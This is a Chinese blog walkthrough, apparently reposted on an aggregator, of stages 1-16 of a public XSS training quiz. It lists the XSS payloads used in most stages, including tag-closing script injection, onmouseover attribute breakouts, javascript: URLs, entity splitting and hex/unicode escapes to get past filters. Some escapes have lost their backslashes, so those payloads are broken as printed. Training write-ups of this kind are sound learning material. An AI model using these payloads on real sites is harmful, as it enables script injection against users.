XSS challenges 1-16

Posted coxq

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了XSS challenges 1-16相关的知识,希望对你有一定的参考价值。

看了一遍视频后自己再试一试,挠头

https://xss-quiz.int21h.jp/

Stage #1

输入1111

显示

技术图片

 

 

 查看代码

技术图片

 

 

 直接输入

<script>alert(document.domain);</script>

 

Stage #2

输入1111

查看代码,如图

技术图片

 

 

 尝试闭合标签

1111 "><script>alert(document.domain)</script>

成功,并且代码显示为

技术图片

 

 

Stage #3

输入1111

代码显示为

技术图片

 

 

 尝试

"><script>alert(document.domain);</script>

显示

技术图片

 

 

 考虑在Japan后进行闭合,打开Burpsuite,进行如图修改

技术图片

 

 

 

p1=1111&p2=Japan >"<script>alert(document.domain)</script>

 成功

 

Stage #4

输入1111

技术图片

 

 

 能发现有个hidden,抓包后能看到

技术图片

 

则尝试在hackme后面添加”><script>alert(document.domain)</script>

技术图片

 

 

 成功

 

Stage #5

输入1111

查看代码

技术图片

 

 

 maxlength只有15,如果输入

"><script>alert(document.domain)</script>不够长

 如图

技术图片

 

 

 则修改maxlength

技术图片

 

 

 再次输入"><script>alert(document.domain)</script>

技术图片

 

 

 成功

 

 

Stage #6

输入1111,查看代码

技术图片

 

 

 尝试闭合,输入"><script>alert(document.domain)</script>

"、<、>都被转换

技术图片

 

 

 尝试" onmouseover="alert(document.domain)

技术图片

 

 

 成功,代码显示为技术图片

 

 

 

 

Stage #7

输入1111,查看代码

技术图片

 

 

 尝试"><script>alert(document.domain)</script>

显示技术图片

 

 

 尝试" onmouseover="alert(document.domain)

显示

技术图片

 

 

 观察代码,好像多了两个双引号,尝试onmouseover=alert(document.domain)

显示技术图片

 

 

 挠头,再试试"onmouseover=alert(document.domain)

技术图片

 

 

 挠头

看看hint

Hint: nearly the same... but a bit more tricky.再看看代码

试试"       onmouseover=alert(document.domain)

行了技术图片

 

 

 

Stage #8

输入1111,查看代码

技术图片

 

 

 和页面显示的技术图片

 

 

 尝试javascript:alert(document.domain)

点击产生的url

技术图片

 

 

 成功

 

Stage #9

输入1111

技术图片

 

 

 眼熟,嗯

先试试"><script>alert(document.domain)</script>

技术图片

 

 

 果然不行,再试试"onmouseover=alert(document.domain),还是不行

技术图片

 

 

 再试试">,还是被变成了字符串的形式

技术图片

 

 

 

再看看hint

Hint: UTF-7 XSS,挠头

跳过

在console里输入

技术图片

 

 

 进入下一关

Stage #10

先输入1111,看代码

技术图片

 

 

 好像比较正常,试试

"><script>alert(document.domain)</script>

技术图片

 

 

 我的domain呢??

试试双写

"><script>alert(document.domdomainain)</script>

ok了

Stage #11

输入1111

技术图片

 

 

 比较正常,试试"><script>alert(document.domain)</script>

技术图片

 

 

 技术图片

 

 

 被转换了

再试试"onmouseover=alert(document.domain)

技术图片

 

 

 onmouseover被过滤了

再试试"><a href="javascript:alert(documment.domain)">xss</a>

技术图片

 

 

 技术图片

 

挠头,被转换了

试试&#10;将JavaScript分开

"><a href="javascr&#10;ipt:alert(document.domain);">xss<a>

技术图片

 点击xss

成功

 

Stage #12

输入1111,查看代码

技术图片

 

 挺正常的,试试"><script>alert(document.domain)</script>

技术图片

 

 >,<都被消去了,看看hint试试将<,>转换成16进制

"x3ex3cscriptx3ealert(document.domain);x3c/scriptx3e

技术图片

 

 挠头,试试

"x3ex3cscriptx3ealert(document.domain);x3c/scriptx3e

挠头,百度启动,要在IE浏览器中用``,

跳过

Stage #13

好像这个的操作别的浏览器不支持了,只有IE支持

跳过

Stage #14

挠头,跳过

Stage #15

输入1111,看代码

技术图片

 

技术图片

 

 

挠头,挺正常,试试"><script>alert(document.domain)</script>

 技术图片

 

挠头,试试转换<,>

"x3ex3cscriptx3ealert(document.domain);x3c/scriptx3e

 技术图片

 

再试试"x3ex3cscriptx3ealert(document.domain);x3c/scriptx3e

 技术图片

 

 ok

Stage #16

直接unicode转换

"u003eu003cscriptu003ealert(document.domain);u003c/scriptu003e

ok

 

  • 添加到短语集
     
    • https://www.nationalgeographic.com/magazine/2020/01/scientists-are-unraveling-the-mysteries-of-pain-feature/
    • 创建新的单词集...
  • 拷贝

以上是关于XSS challenges 1-16的主要内容,如果未能解决你的问题,请参考以下文章

XSS-Lab(XSS注入笔记1-16)

XSS-Lab(XSS注入笔记1-16)

XSS Challenges

XSS练习平台XSS Challenges

escape.alf.nu XSS Challenges 0-7 之一步步学XSS

XSS Challenges